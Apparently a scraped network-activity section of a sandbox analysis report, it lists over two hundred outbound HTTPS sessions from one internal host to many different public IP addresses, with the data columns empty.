                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20611192.168.2.235082059.221.197.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20612192.168.2.2356456167.86.83.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20613192.168.2.235928873.159.126.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20614192.168.2.234324289.225.50.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20615192.168.2.2339842101.229.26.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20616192.168.2.236007232.5.212.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20617192.168.2.235474467.177.22.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20618192.168.2.2353080154.205.254.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20619192.168.2.2341210124.12.195.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20620192.168.2.235083819.114.217.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20621192.168.2.235645417.80.240.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20622192.168.2.2358856155.213.43.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20623192.168.2.233439480.70.252.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20624192.168.2.2333794161.37.201.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20625192.168.2.2355616115.94.45.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20626192.168.2.2338836218.183.137.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20627192.168.2.234735282.113.154.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20628192.168.2.235101241.43.103.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20629192.168.2.235984894.74.165.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20630192.168.2.2338492197.112.77.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20631192.168.2.234915696.131.69.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20632192.168.2.235012067.7.97.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20633192.168.2.2333910217.172.169.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20634192.168.2.2357372104.33.90.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20635192.168.2.2335660160.24.33.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20636192.168.2.235122244.146.218.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20637192.168.2.234923636.241.184.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20638192.168.2.2346118157.49.139.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20639192.168.2.2345324146.199.145.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20640192.168.2.234441486.117.12.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20641192.168.2.235354836.144.3.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20642192.168.2.2344096122.132.61.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20643192.168.2.2356462205.84.150.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20644192.168.2.235318644.69.1.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20645192.168.2.2350380222.233.37.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20646192.168.2.2355506112.113.172.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20647192.168.2.234978072.167.82.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20648192.168.2.2350822144.105.63.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20649192.168.2.2354210181.92.65.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20650192.168.2.2360590197.65.138.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20651192.168.2.235728831.104.101.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20652192.168.2.235440498.226.60.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20653192.168.2.2360664212.230.209.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20654192.168.2.235027614.124.169.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20655192.168.2.234475438.70.152.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20656192.168.2.23424921.175.47.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20657192.168.2.2357536113.135.81.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20658192.168.2.2342662195.147.91.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20659192.168.2.2358848139.232.140.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20660192.168.2.2360116110.99.240.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20661192.168.2.235518248.248.12.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20662192.168.2.2357002112.45.184.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20663192.168.2.2353094222.164.200.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20664192.168.2.234809820.29.3.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20665192.168.2.2355630112.189.56.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20666192.168.2.234543017.245.49.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20667192.168.2.2336984193.109.152.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20668192.168.2.2342326181.26.116.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20669192.168.2.233469439.49.122.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20670192.168.2.2341338159.5.134.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20671192.168.2.2333588160.25.98.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20672192.168.2.23609268.62.239.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20673192.168.2.2343332114.249.87.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20674192.168.2.2338738197.110.109.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20675192.168.2.234323623.210.62.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20676192.168.2.235094049.211.223.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20677192.168.2.2348798115.2.77.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20678192.168.2.2351746205.176.140.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20679192.168.2.2350500133.217.48.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20680192.168.2.2344708137.188.12.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20681192.168.2.233826237.230.54.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20682192.168.2.234177618.248.197.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20683192.168.2.235420296.175.233.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20684192.168.2.235026070.22.88.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20685192.168.2.2357666146.25.110.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20686192.168.2.2355374122.240.110.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20687192.168.2.2336510187.159.70.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20688192.168.2.2334592106.156.194.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20689192.168.2.235998427.130.92.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20690192.168.2.2344810134.139.142.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20691192.168.2.235816650.98.156.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20692192.168.2.233753039.145.47.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20693192.168.2.234796265.46.6.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20694192.168.2.235024066.235.58.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20695192.168.2.2359812182.109.182.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20696192.168.2.2338952152.225.226.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20697192.168.2.235383672.31.59.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20698192.168.2.233410282.98.231.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20699192.168.2.234757219.16.101.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20700192.168.2.235533073.232.56.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20701192.168.2.234014212.230.196.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20702192.168.2.2349614112.240.2.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20703192.168.2.2334944176.169.40.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20704192.168.2.2333140155.84.79.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20705192.168.2.2342836201.245.252.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20706192.168.2.234651634.202.232.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20707192.168.2.2343362184.158.112.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20708192.168.2.2357126222.89.49.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20709192.168.2.2347228188.134.248.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20710192.168.2.2354290217.131.252.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20711192.168.2.236033059.251.178.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20712192.168.2.234830053.69.63.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20713192.168.2.233588246.177.60.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20714192.168.2.2332776199.252.77.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20715192.168.2.233990434.168.195.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20716192.168.2.2355144123.235.163.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20717192.168.2.2349092166.86.169.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20718192.168.2.2341046117.3.220.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20719192.168.2.2359340141.130.11.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20720192.168.2.2348580126.162.55.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20721192.168.2.2346846101.191.55.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20722192.168.2.233745266.63.230.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20723192.168.2.233975298.166.117.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20724192.168.2.235224412.148.158.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20725192.168.2.2333226196.87.30.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20726192.168.2.2347234189.214.32.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20727192.168.2.2335130221.151.129.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20728192.168.2.2348830159.59.255.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20729192.168.2.2352104153.95.115.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20730192.168.2.235382464.122.194.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20731192.168.2.235725469.69.153.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20732192.168.2.2335860140.201.15.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20733192.168.2.2334256133.104.30.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20734192.168.2.233980427.31.150.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20735192.168.2.2346846113.220.132.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20736192.168.2.2352872123.234.40.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20737192.168.2.235533414.254.254.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20738192.168.2.2337254164.155.174.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20739192.168.2.234492442.168.125.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20740192.168.2.234681471.236.74.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20741192.168.2.234841039.99.34.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20742192.168.2.234588049.82.98.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20743192.168.2.2353350169.181.74.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20744192.168.2.2337830124.155.164.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20745192.168.2.2351532157.50.207.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20746192.168.2.2352496173.34.92.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20747192.168.2.2360234180.55.39.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20748192.168.2.235181074.89.229.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20749192.168.2.2340666203.95.229.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20750192.168.2.235475224.172.214.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20751192.168.2.2355590181.41.182.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20752192.168.2.2360312114.86.34.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20753192.168.2.2334600159.130.0.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20754192.168.2.2346232157.65.80.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20755192.168.2.2355484120.207.119.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20756192.168.2.234901660.39.139.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20757192.168.2.23393689.155.235.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20758192.168.2.233699870.87.107.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20759192.168.2.2346354109.24.136.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20760192.168.2.235951480.82.82.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20761192.168.2.235080696.136.68.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20762192.168.2.2334424196.49.61.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20763192.168.2.2354574186.28.6.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20764192.168.2.2353770108.208.221.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20765192.168.2.2357394114.166.64.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20766192.168.2.23367005.176.241.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20767192.168.2.235504686.119.230.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20768192.168.2.2337858152.242.129.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20769192.168.2.234919425.123.101.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20770192.168.2.233714874.206.142.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20771192.168.2.2347684197.89.219.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20772192.168.2.2337630189.118.225.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20773192.168.2.2353962107.220.164.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20774192.168.2.2356096134.215.113.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20775192.168.2.2346714189.142.88.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20776192.168.2.2341946221.251.58.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20777192.168.2.235525223.150.71.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20778192.168.2.235877865.130.17.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20779192.168.2.2334632134.212.48.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20780192.168.2.235154687.213.87.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20781192.168.2.2358092134.251.81.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20782192.168.2.2340080133.116.40.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20783192.168.2.235188062.127.190.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20784192.168.2.2337772199.154.178.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20785192.168.2.234277651.104.57.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20786192.168.2.2334558219.80.163.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20787192.168.2.234774694.116.226.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20788192.168.2.2350732122.158.172.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20789192.168.2.2348934147.189.195.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20790192.168.2.2355768182.172.117.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20791192.168.2.235557262.19.41.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20792192.168.2.2345300183.135.4.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20793192.168.2.2353588155.84.163.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20794192.168.2.2347856167.203.2.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20795192.168.2.2338034196.42.43.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20796192.168.2.233340247.42.200.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20797192.168.2.233793841.225.206.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20798192.168.2.2337474194.181.21.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20799192.168.2.2359784216.216.226.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20800192.168.2.2333480154.165.17.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20801192.168.2.2337704189.10.250.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20802192.168.2.2358498113.29.174.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20803192.168.2.233874684.157.12.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20804192.168.2.2332834125.140.4.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20805192.168.2.2338556139.123.2.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20806192.168.2.233642292.207.93.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20807192.168.2.2355982199.140.233.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20808192.168.2.2344938104.81.238.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20809192.168.2.2349362221.82.88.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20810192.168.2.234890066.158.213.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20811192.168.2.235907498.102.189.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20812192.168.2.2352596118.116.90.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20813192.168.2.233517837.73.203.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20814192.168.2.2356038135.243.30.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20815192.168.2.2334052177.16.254.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20816192.168.2.2352892119.139.242.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20817192.168.2.234307042.36.185.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20818192.168.2.235317059.169.60.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20819192.168.2.235561262.213.125.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20820192.168.2.2351892139.242.168.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20821192.168.2.2352168145.57.64.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20822192.168.2.2337706195.94.130.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20823192.168.2.235784285.43.71.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20824192.168.2.234810463.231.230.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20825192.168.2.235461679.229.134.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20826192.168.2.2351410174.82.156.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20827192.168.2.2348600193.98.57.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20828192.168.2.2358064148.64.146.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20829192.168.2.2353684211.226.109.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20830192.168.2.2338276150.209.36.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20831192.168.2.2336414123.115.7.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20832192.168.2.234046019.122.220.225443
